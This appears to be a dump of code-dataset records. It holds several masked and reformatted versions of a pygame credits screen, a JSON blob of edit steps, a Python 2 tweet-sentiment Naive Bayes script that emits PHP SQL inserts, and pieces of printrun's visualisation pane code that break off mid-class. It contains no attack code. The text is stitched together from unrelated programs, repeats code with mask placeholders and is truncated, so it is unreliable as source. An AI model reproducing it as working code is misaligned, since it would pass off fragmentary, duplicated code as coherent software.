GREEN = 0, 255, 0
BLUE = 0, 0, 255
YELLOW = 255, 255, 0
GRAY80 = 204, 204, 204
GRAY = 26, 26, 26
screen = pygame.display.set_mode((1000, 800))
game_folder = os.path.dirname(__file__)
img_folder = os.path.join(game_folder, 'img')
def draw_text(surf, text, size, x, y):
font_name = pygame.font.match_font('OCR A Extended')
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, WHITE)
text_rect = text_surface.get_rect()
text_rect.midtop = x, y
surf.blit(text_surface, text_rect)
def button(msg, x, y, w, h, ic, ac, action=None):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
print(click)
if x + w > mouse[0] > x and y + h > mouse[1] > y:
pygame.draw.rect(screen, ac, (x, y, w, h))
if click[0] == 1 and action != None:
if action == quit:
pygame.quit()
quit()
else:
pygame.draw.rect(screen, ic, (x, y, w, h))
def main():
pygame.init()
pygame.mixer.init()
screen = pygame.display.set_mode((1000, 800))
pygame.display.set_caption('Credits')
background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')
).convert_alpha()
clock = pygame.time.Clock()
start_ticks = pygame.time.get_ticks()
screen.blit(background, (0, 0))
pygame.display.flip()
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
quit()
screen.blit(background, (0, 0))
pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'Credits', 60, 500, 100)
draw_text(screen, 'Vincent', 30, 500, 250)
draw_text(screen, 'Chevery', 30, 500, 330)
draw_text(screen, 'Charlie', 30, 500, 410)
draw_text(screen, 'Julian', 30, 500, 490)
draw_text(screen, 'Sheriyar', 30, 500, 570)
draw_text(screen, 'Julian', 30, 500, 650)
mouse = pygame.mouse.get_pos()
if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:
pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))
else:
pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'EXIT', 40, 488, 660)
button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)
pygame.display.flip()
if __name__ == '__main__':
main()
pygame.quit()
<|reserved_special_token_1|>
import os, pygame
import sys
from os import path
from random import choice
WIDTH = 1000
HEIGHT = 800
FPS = 60
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
GRAY80 = (204, 204, 204)
GRAY = (26, 26, 26)
screen = pygame.display.set_mode((1000, 800))
game_folder = os.path.dirname(__file__)
img_folder = os.path.join(game_folder, "img")
def draw_text(surf, text, size, x, y):
font_name = pygame.font.match_font('OCR A Extended')
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, WHITE)
text_rect = text_surface.get_rect()
text_rect.midtop = (x, y)
surf.blit(text_surface, text_rect)
def button(msg,x,y,w,h,ic,ac,action=None):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
print(click)
if x+w > mouse[0] > x and y+h > mouse[1] > y:
pygame.draw.rect(screen, ac,(x,y,w,h))
if click[0] == 1 and action != None:
if action == quit:
pygame.quit()
quit()
else:
pygame.draw.rect(screen, ic,(x,y,w,h))
def main():
# Initialise screen
pygame.init()
pygame.mixer.init()
screen = pygame.display.set_mode((1000, 800))
pygame.display.set_caption('Credits')
# Fill background
background = pygame.image.load(os.path.join(img_folder, "STARS1.jpg")).convert_alpha()
clock = pygame.time.Clock()
start_ticks=pygame.time.get_ticks()
screen.blit(background, (0, 0))
pygame.display.flip()
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
quit()
screen.blit(background, (0, 0))
pygame.draw.rect(screen, GRAY,(400,650,190,60))
draw_text(screen, "Credits", 60, 500, 100)
draw_text(screen, "Vincent", 30, 500, 250)
draw_text(screen, "Chevery", 30, 500, 330)
draw_text(screen, "Charlie", 30, 500, 410)
draw_text(screen, "Julian", 30, 500, 490)
draw_text(screen, "Sheriyar", 30, 500, 570)
draw_text(screen, "Julian", 30, 500, 650)
mouse = pygame.mouse.get_pos()
if 400+190 > mouse[0] > 400 and 650+60 > mouse[1] > 650:
pygame.draw.rect(screen, GRAY80,(400,650,190,60))
else:
pygame.draw.rect(screen, GRAY,(400,650,190,60))
draw_text(screen, "EXIT", 40, 488, 660)
#screen.blit(arrow, imagerect)
button("EXIT",400,650,190,60,GRAY,GRAY80,quit)
pygame.display.flip()
if __name__ == '__main__':
main()
pygame.quit()
|
flexible
|
{
"blob_id": "7301a521586049ebb5e8e49b604cc96e3acc1fe9",
"index": 3512,
"step-1": "<mask token>\n\n\ndef draw_text(surf, text, size, x, y):\n font_name = pygame.font.match_font('OCR A Extended')\n font = pygame.font.Font(font_name, size)\n text_surface = font.render(text, True, WHITE)\n text_rect = text_surface.get_rect()\n text_rect.midtop = x, y\n surf.blit(text_surface, text_rect)\n\n\ndef button(msg, x, y, w, h, ic, ac, action=None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n print(click)\n if x + w > mouse[0] > x and y + h > mouse[1] > y:\n pygame.draw.rect(screen, ac, (x, y, w, h))\n if click[0] == 1 and action != None:\n if action == quit:\n pygame.quit()\n quit()\n else:\n pygame.draw.rect(screen, ic, (x, y, w, h))\n\n\ndef main():\n pygame.init()\n pygame.mixer.init()\n screen = pygame.display.set_mode((1000, 800))\n pygame.display.set_caption('Credits')\n background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')\n ).convert_alpha()\n clock = pygame.time.Clock()\n start_ticks = pygame.time.get_ticks()\n screen.blit(background, (0, 0))\n pygame.display.flip()\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n quit()\n screen.blit(background, (0, 0))\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'Credits', 60, 500, 100)\n draw_text(screen, 'Vincent', 30, 500, 250)\n draw_text(screen, 'Chevery', 30, 500, 330)\n draw_text(screen, 'Charlie', 30, 500, 410)\n draw_text(screen, 'Julian', 30, 500, 490)\n draw_text(screen, 'Sheriyar', 30, 500, 570)\n draw_text(screen, 'Julian', 30, 500, 650)\n mouse = pygame.mouse.get_pos()\n if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:\n pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))\n else:\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'EXIT', 40, 488, 660)\n button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)\n pygame.display.flip()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef draw_text(surf, text, size, x, y):\n font_name = pygame.font.match_font('OCR A Extended')\n font = pygame.font.Font(font_name, size)\n text_surface = font.render(text, True, WHITE)\n text_rect = text_surface.get_rect()\n text_rect.midtop = x, y\n surf.blit(text_surface, text_rect)\n\n\ndef button(msg, x, y, w, h, ic, ac, action=None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n print(click)\n if x + w > mouse[0] > x and y + h > mouse[1] > y:\n pygame.draw.rect(screen, ac, (x, y, w, h))\n if click[0] == 1 and action != None:\n if action == quit:\n pygame.quit()\n quit()\n else:\n pygame.draw.rect(screen, ic, (x, y, w, h))\n\n\ndef main():\n pygame.init()\n pygame.mixer.init()\n screen = pygame.display.set_mode((1000, 800))\n pygame.display.set_caption('Credits')\n background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')\n ).convert_alpha()\n clock = pygame.time.Clock()\n start_ticks = pygame.time.get_ticks()\n screen.blit(background, (0, 0))\n pygame.display.flip()\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n quit()\n screen.blit(background, (0, 0))\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'Credits', 60, 500, 100)\n draw_text(screen, 'Vincent', 30, 500, 250)\n draw_text(screen, 'Chevery', 30, 500, 330)\n draw_text(screen, 'Charlie', 30, 500, 410)\n draw_text(screen, 'Julian', 30, 500, 490)\n draw_text(screen, 'Sheriyar', 30, 500, 570)\n draw_text(screen, 'Julian', 30, 500, 650)\n mouse = pygame.mouse.get_pos()\n if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:\n pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))\n else:\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'EXIT', 40, 488, 660)\n button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)\n pygame.display.flip()\n\n\nif __name__ == '__main__':\n main()\n pygame.quit()\n",
"step-3": "<mask token>\nWIDTH = 1000\nHEIGHT = 800\nFPS = 60\nBLACK = 0, 0, 0\nWHITE = 255, 255, 255\nRED = 255, 0, 0\nGREEN = 0, 255, 0\nBLUE = 0, 0, 255\nYELLOW = 255, 255, 0\nGRAY80 = 204, 204, 204\nGRAY = 26, 26, 26\nscreen = pygame.display.set_mode((1000, 800))\ngame_folder = os.path.dirname(__file__)\nimg_folder = os.path.join(game_folder, 'img')\n\n\ndef draw_text(surf, text, size, x, y):\n font_name = pygame.font.match_font('OCR A Extended')\n font = pygame.font.Font(font_name, size)\n text_surface = font.render(text, True, WHITE)\n text_rect = text_surface.get_rect()\n text_rect.midtop = x, y\n surf.blit(text_surface, text_rect)\n\n\ndef button(msg, x, y, w, h, ic, ac, action=None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n print(click)\n if x + w > mouse[0] > x and y + h > mouse[1] > y:\n pygame.draw.rect(screen, ac, (x, y, w, h))\n if click[0] == 1 and action != None:\n if action == quit:\n pygame.quit()\n quit()\n else:\n pygame.draw.rect(screen, ic, (x, y, w, h))\n\n\ndef main():\n pygame.init()\n pygame.mixer.init()\n screen = pygame.display.set_mode((1000, 800))\n pygame.display.set_caption('Credits')\n background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')\n ).convert_alpha()\n clock = pygame.time.Clock()\n start_ticks = pygame.time.get_ticks()\n screen.blit(background, (0, 0))\n pygame.display.flip()\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n quit()\n screen.blit(background, (0, 0))\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'Credits', 60, 500, 100)\n draw_text(screen, 'Vincent', 30, 500, 250)\n draw_text(screen, 'Chevery', 30, 500, 330)\n draw_text(screen, 'Charlie', 30, 500, 410)\n draw_text(screen, 'Julian', 30, 500, 490)\n draw_text(screen, 'Sheriyar', 30, 500, 570)\n draw_text(screen, 'Julian', 30, 500, 650)\n mouse = pygame.mouse.get_pos()\n if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:\n pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))\n else:\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'EXIT', 40, 488, 660)\n button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)\n pygame.display.flip()\n\n\nif __name__ == '__main__':\n main()\n pygame.quit()\n",
"step-4": "import os, pygame\nimport sys\nfrom os import path\nfrom random import choice\nWIDTH = 1000\nHEIGHT = 800\nFPS = 60\nBLACK = 0, 0, 0\nWHITE = 255, 255, 255\nRED = 255, 0, 0\nGREEN = 0, 255, 0\nBLUE = 0, 0, 255\nYELLOW = 255, 255, 0\nGRAY80 = 204, 204, 204\nGRAY = 26, 26, 26\nscreen = pygame.display.set_mode((1000, 800))\ngame_folder = os.path.dirname(__file__)\nimg_folder = os.path.join(game_folder, 'img')\n\n\ndef draw_text(surf, text, size, x, y):\n font_name = pygame.font.match_font('OCR A Extended')\n font = pygame.font.Font(font_name, size)\n text_surface = font.render(text, True, WHITE)\n text_rect = text_surface.get_rect()\n text_rect.midtop = x, y\n surf.blit(text_surface, text_rect)\n\n\ndef button(msg, x, y, w, h, ic, ac, action=None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n print(click)\n if x + w > mouse[0] > x and y + h > mouse[1] > y:\n pygame.draw.rect(screen, ac, (x, y, w, h))\n if click[0] == 1 and action != None:\n if action == quit:\n pygame.quit()\n quit()\n else:\n pygame.draw.rect(screen, ic, (x, y, w, h))\n\n\ndef main():\n pygame.init()\n pygame.mixer.init()\n screen = pygame.display.set_mode((1000, 800))\n pygame.display.set_caption('Credits')\n background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')\n ).convert_alpha()\n clock = pygame.time.Clock()\n start_ticks = pygame.time.get_ticks()\n screen.blit(background, (0, 0))\n pygame.display.flip()\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n quit()\n screen.blit(background, (0, 0))\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'Credits', 60, 500, 100)\n draw_text(screen, 'Vincent', 30, 500, 250)\n draw_text(screen, 'Chevery', 30, 500, 330)\n draw_text(screen, 'Charlie', 30, 500, 410)\n draw_text(screen, 'Julian', 30, 500, 490)\n draw_text(screen, 'Sheriyar', 30, 500, 570)\n draw_text(screen, 'Julian', 30, 500, 650)\n mouse = pygame.mouse.get_pos()\n if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:\n pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))\n else:\n pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))\n draw_text(screen, 'EXIT', 40, 488, 660)\n button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)\n pygame.display.flip()\n\n\nif __name__ == '__main__':\n main()\n pygame.quit()\n",
"step-5": "import os, pygame\r\nimport sys\r\nfrom os import path\r\nfrom random import choice\r\n\r\nWIDTH = 1000\r\nHEIGHT = 800\r\nFPS = 60\r\n\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nYELLOW = (255, 255, 0)\r\nGRAY80 = (204, 204, 204)\r\nGRAY = (26, 26, 26)\r\n\r\n\r\nscreen = pygame.display.set_mode((1000, 800))\r\ngame_folder = os.path.dirname(__file__)\r\nimg_folder = os.path.join(game_folder, \"img\")\r\n\r\ndef draw_text(surf, text, size, x, y):\r\n font_name = pygame.font.match_font('OCR A Extended')\r\n font = pygame.font.Font(font_name, size)\r\n text_surface = font.render(text, True, WHITE)\r\n text_rect = text_surface.get_rect()\r\n text_rect.midtop = (x, y)\r\n surf.blit(text_surface, text_rect)\r\n\r\ndef button(msg,x,y,w,h,ic,ac,action=None):\r\n mouse = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n print(click)\r\n\r\n if x+w > mouse[0] > x and y+h > mouse[1] > y:\r\n pygame.draw.rect(screen, ac,(x,y,w,h))\r\n if click[0] == 1 and action != None:\r\n if action == quit:\r\n pygame.quit()\r\n quit()\r\n else:\r\n pygame.draw.rect(screen, ic,(x,y,w,h))\r\n\r\ndef main():\r\n # Initialise screen\r\n pygame.init()\r\n pygame.mixer.init()\r\n screen = pygame.display.set_mode((1000, 800))\r\n pygame.display.set_caption('Credits')\r\n\r\n # Fill background\r\n background = pygame.image.load(os.path.join(img_folder, \"STARS1.jpg\")).convert_alpha()\r\n clock = pygame.time.Clock()\r\n start_ticks=pygame.time.get_ticks()\r\n screen.blit(background, (0, 0))\r\n pygame.display.flip()\r\n running = True\r\n\r\n while running:\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n return\r\n quit()\r\n\r\n screen.blit(background, (0, 0))\r\n pygame.draw.rect(screen, GRAY,(400,650,190,60))\r\n draw_text(screen, \"Credits\", 60, 500, 100)\r\n draw_text(screen, \"Vincent\", 30, 500, 250)\r\n draw_text(screen, \"Chevery\", 30, 500, 330)\r\n draw_text(screen, \"Charlie\", 30, 500, 410)\r\n draw_text(screen, \"Julian\", 30, 500, 490)\r\n draw_text(screen, \"Sheriyar\", 30, 500, 570)\r\n draw_text(screen, \"Julian\", 30, 500, 650)\r\n\r\n mouse = pygame.mouse.get_pos()\r\n\r\n if 400+190 > mouse[0] > 400 and 650+60 > mouse[1] > 650:\r\n pygame.draw.rect(screen, GRAY80,(400,650,190,60))\r\n else:\r\n pygame.draw.rect(screen, GRAY,(400,650,190,60))\r\n \r\n draw_text(screen, \"EXIT\", 40, 488, 660)\r\n #screen.blit(arrow, imagerect)\r\n button(\"EXIT\",400,650,190,60,GRAY,GRAY80,quit)\r\n \r\n pygame.display.flip()\r\n\r\nif __name__ == '__main__': \r\n main()\r\n pygame.quit()\r\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import collections
import re
from collections import Counter
import operator
import pickle
import math
import json
path='C:/Users/rahul/Desktop/CSCI 544/HW 2/op_spam_train/'
#path=sys.argv[1]
badWordList = ['and','the','was','for']
RE=r'\b[^\W\d_]+\b'
# NEGATIVE TWEETS
c=collections.Counter()
NT="negativeTweets.txt/"
with open("negativeTweets.txt") as f:
c.update( word.lower() for line in f for word in re.findall(r'\b[^\W\d_]+\b', line) if len(word)>2 and word not in badWordList)
# POSITIVE TWEETS
d=collections.Counter()
PT="positiveTweets.txt/"
with open("positiveTweets.txt") as f:
d.update( word.lower() for line in f for word in re.findall(r'\b[^\W\d_]+\b', line) if len(word)>2 and word not in badWordList)
# Storing Counts in a dictionary nb
dicts=[dict(c),dict(d)]
nb,cnt={},0
for d in dicts:
for k, v in d.items():
if(k in nb): nb[k][cnt]= nb[k][cnt]+v
else:
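            # first occurrence of this word: start both class counts at 1 (add-one smoothing)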
nb[k]=[1,1]
nb[k][cnt]= nb[k][cnt]+v
cnt=cnt+1
for k, v in nb.items():
    print(k, v)
print(len(nb))
totalClassWord=[0,0]
for k, v in nb.items():
totalClassWord=[x + y for x, y in zip(totalClassWord, v)]
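# turn the smoothed counts into per-class log10 likelihoods: log10(count(word, class) / total(class))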
prob={}
for k, v in nb.items():
prob[k]=[0,0]
prob[k][0]= math.log10( float(nb[k][0])/float(totalClassWord[0]))
prob[k][1]= math.log10( float(nb[k][1])/float(totalClassWord[1]))
for k, v in prob.items():
    print(k, v)
#Dumping dictionary as JSON object in file
#with open('hackTechTweetClassificationModel.txt', 'wb') as handle: pickle.dump(prob, handle)
keys=json.dumps(prob, sort_keys=True)
output_file=open('hackTechTweetClassificationModel.txt', 'w')
output_file.write(keys)
output_file.close()
output_file=open('hackTechTweetPHP.php', 'w')
#Format of PHP output
#$result=mysqli_query($con, "INSERT INTO ttrain VALUES ('aaa','-2.232','222.4234')" );
for k,v in prob.items():
strop="$result=mysqli_query($con, \"INSERT INTO ttrain VALUES (\'"+str(k)+"\',\'"+str(v[0])+"\',\'"+str(v[1])+"\')\" );\n"
output_file.write(strop)
output_file.close()
|
normal
|
{
"blob_id": "42e16def0fcf234f3d7c2709de36a321d8ddf29e",
"index": 7598,
"step-1": "import collections\nimport re\nfrom collections import Counter\nimport operator\nimport pickle\nimport math\nimport json\n\npath='C:/Users/rahul/Desktop/CSCI 544/HW 2/op_spam_train/'\n#path=sys.argv[1]\n\nbadWordList = ['and','the','was','for']\nRE=r'\\b[^\\W\\d_]+\\b'\n\n# NEGATIVE TWEETS\nc=collections.Counter()\nNT=\"negativeTweets.txt/\"\nwith open(\"negativeTweets.txt\") as f: \n c.update( word.lower() for line in f for word in re.findall(r'\\b[^\\W\\d_]+\\b', line) if len(word)>2 and word not in badWordList)\n\n# POSITIVE TWEETS\nd=collections.Counter()\nPT=\"positiveTweets.txt/\"\nwith open(\"positiveTweets.txt\") as f: \n d.update( word.lower() for line in f for word in re.findall(r'\\b[^\\W\\d_]+\\b', line) if len(word)>2 and word not in badWordList)\n\n# Storing Counts in a dictionary nb\ndicts=[dict(c),dict(d)] \nnb,cnt={},0\nfor d in dicts:\n for k, v in d.items():\n if(k in nb): nb[k][cnt]= nb[k][cnt]+v\n else: \n nb[k]=[1,1]\n nb[k][cnt]= nb[k][cnt]+v\n cnt=cnt+1\n\nfor k,v in nb.items():\n print k,v\n \nprint len(nb);\n\ntotalClassWord=[0,0]\nfor k, v in nb.items():\n totalClassWord=[x + y for x, y in zip(totalClassWord, v)]\n\nprob={} \nfor k, v in nb.items():\n prob[k]=[0,0]\n prob[k][0]= math.log10( float(nb[k][0])/float(totalClassWord[0]))\n prob[k][1]= math.log10( float(nb[k][1])/float(totalClassWord[1]))\n\nfor k,v in prob.items():\n print k,v\n\n#Dumping dictionary as JSON object in file\n#with open('hackTechTweetClassificationModel.txt', 'wb') as handle: pickle.dump(prob, handle)\nkeys=json.dumps(prob, sort_keys=True)\noutput_file=open('hackTechTweetClassificationModel.txt', 'w')\noutput_file.write(keys)\noutput_file.close()\n\noutput_file=open('hackTechTweetPHP.php', 'w')\n#Format of PHP output\n#$result=mysqli_query($con, \"INSERT INTO ttrain VALUES ('aaa','-2.232','222.4234')\" );\nfor k,v in prob.items():\n strop=\"$result=mysqli_query($con, \\\"INSERT INTO ttrain VALUES (\\'\"+str(k)+\"\\',\\'\"+str(v[0])+\"\\',\\'\"+str(v[1])+\"\\')\\\" );\\n\" \n output_file.write(strop)\noutput_file.close()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class NoViz:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def addfile(self, *a, **kw):
pass
def addgcode(self, *a, **kw):
pass
def addgcodehighlight(self, *a, **kw):
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class NoVizWindow:
def __init__(self):
self.p = NoViz()
def Destroy(self):
pass
class VizPane(wx.BoxSizer):
def __init__(self, root, parentpanel=None):
super(VizPane, self).__init__(wx.VERTICAL)
if not parentpanel:
parentpanel = root.panel
if root.settings.mainviz == 'None':
root.gviz = NoViz()
root.gwindow = NoVizWindow()
return
use2dview = root.settings.mainviz == '2D'
if root.settings.mainviz == '3D':
try:
import printrun.gcview
root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,
root.build_dimensions_list, root=root, circular=root.
settings.circular_bed, antialias_samples=int(root.
settings.antialias3dsamples))
root.gviz.clickcb = root.show_viz_window
except:
use2dview = True
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if use2dview:
from printrun import gviz
root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions
=root.build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
bgcolor=root.bgcolor)
root.gviz.SetToolTip(wx.ToolTip(_(
'Click to examine / edit\n layers of loaded file')))
root.gviz.showall = 1
root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)
use3dview = root.settings.viz3d
if use3dview:
try:
import printrun.gcview
objects = None
if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):
objects = root.gviz.objects
root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.
ID_ANY,
'Gcode view, shift to move view, mousewheel to set layer',
size=(600, 600), build_dimensions=root.
build_dimensions_list, objects=objects, root=root,
circular=root.settings.circular_bed, antialias_samples=
int(root.settings.antialias3dsamples))
except:
use3dview = False
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if not use3dview:
from printrun import gviz
root.gwindow = gviz.GvizWindow(build_dimensions=root.
build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
bgcolor=root.bgcolor)
root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())
if not isinstance(root.gviz, NoViz):
self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.
ALIGN_CENTER_HORIZONTAL)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class NoViz:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def addfile(self, *a, **kw):
pass
def addgcode(self, *a, **kw):
pass
def addgcodehighlight(self, *a, **kw):
pass
<|reserved_special_token_0|>
def setlayer(self, *a):
pass
class NoVizWindow:
def __init__(self):
self.p = NoViz()
def Destroy(self):
pass
class VizPane(wx.BoxSizer):
def __init__(self, root, parentpanel=None):
super(VizPane, self).__init__(wx.VERTICAL)
if not parentpanel:
parentpanel = root.panel
if root.settings.mainviz == 'None':
root.gviz = NoViz()
root.gwindow = NoVizWindow()
return
use2dview = root.settings.mainviz == '2D'
if root.settings.mainviz == '3D':
try:
import printrun.gcview
root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,
root.build_dimensions_list, root=root, circular=root.
settings.circular_bed, antialias_samples=int(root.
settings.antialias3dsamples))
root.gviz.clickcb = root.show_viz_window
except:
use2dview = True
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if use2dview:
from printrun import gviz
root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions
=root.build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
bgcolor=root.bgcolor)
root.gviz.SetToolTip(wx.ToolTip(_(
'Click to examine / edit\n layers of loaded file')))
root.gviz.showall = 1
root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)
use3dview = root.settings.viz3d
if use3dview:
try:
import printrun.gcview
objects = None
if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):
objects = root.gviz.objects
root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.
ID_ANY,
'Gcode view, shift to move view, mousewheel to set layer',
size=(600, 600), build_dimensions=root.
build_dimensions_list, objects=objects, root=root,
circular=root.settings.circular_bed, antialias_samples=
int(root.settings.antialias3dsamples))
except:
use3dview = False
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if not use3dview:
from printrun import gviz
root.gwindow = gviz.GvizWindow(build_dimensions=root.
build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
bgcolor=root.bgcolor)
root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())
if not isinstance(root.gviz, NoViz):
self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.
ALIGN_CENTER_HORIZONTAL)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class NoViz:
<|reserved_special_token_0|>
def clear(self, *a):
pass
<|reserved_special_token_0|>
def addfile(self, *a, **kw):
pass
def addgcode(self, *a, **kw):
pass
def addgcodehighlight(self, *a, **kw):
pass
<|reserved_special_token_0|>
def setlayer(self, *a):
pass
class NoVizWindow:
def __init__(self):
self.p = NoViz()
def Destroy(self):
pass
class VizPane(wx.BoxSizer):
def __init__(self, root, parentpanel=None):
super(VizPane, self).__init__(wx.VERTICAL)
if not parentpanel:
parentpanel = root.panel
if root.settings.mainviz == 'None':
root.gviz = NoViz()
root.gwindow = NoVizWindow()
return
use2dview = root.settings.mainviz == '2D'
if root.settings.mainviz == '3D':
try:
import printrun.gcview
root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,
root.build_dimensions_list, root=root, circular=root.
settings.circular_bed, antialias_samples=int(root.
settings.antialias3dsamples))
root.gviz.clickcb = root.show_viz_window
except:
use2dview = True
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if use2dview:
from printrun import gviz
root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions
=root.build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
bgcolor=root.bgcolor)
root.gviz.SetToolTip(wx.ToolTip(_(
'Click to examine / edit\n layers of loaded file')))
root.gviz.showall = 1
root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)
use3dview = root.settings.viz3d
if use3dview:
try:
import printrun.gcview
objects = None
if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):
objects = root.gviz.objects
root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.
ID_ANY,
'Gcode view, shift to move view, mousewheel to set layer',
size=(600, 600), build_dimensions=root.
build_dimensions_list, objects=objects, root=root,
circular=root.settings.circular_bed, antialias_samples=
int(root.settings.antialias3dsamples))
except:
use3dview = False
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if not use3dview:
from printrun import gviz
root.gwindow = gviz.GvizWindow(build_dimensions=root.
build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
bgcolor=root.bgcolor)
root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())
if not isinstance(root.gviz, NoViz):
self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.
ALIGN_CENTER_HORIZONTAL)
<|reserved_special_token_1|>
import traceback
import logging
import wx
class NoViz:
showall = False
def clear(self, *a):
pass
def addfile_perlayer(self, gcode, showall=False):
layer_idx = 0
while layer_idx < len(gcode.all_layers):
yield layer_idx
layer_idx += 1
yield None
def addfile(self, *a, **kw):
pass
def addgcode(self, *a, **kw):
pass
def addgcodehighlight(self, *a, **kw):
pass
def Refresh(self, *a):
pass
def setlayer(self, *a):
pass
class NoVizWindow:
def __init__(self):
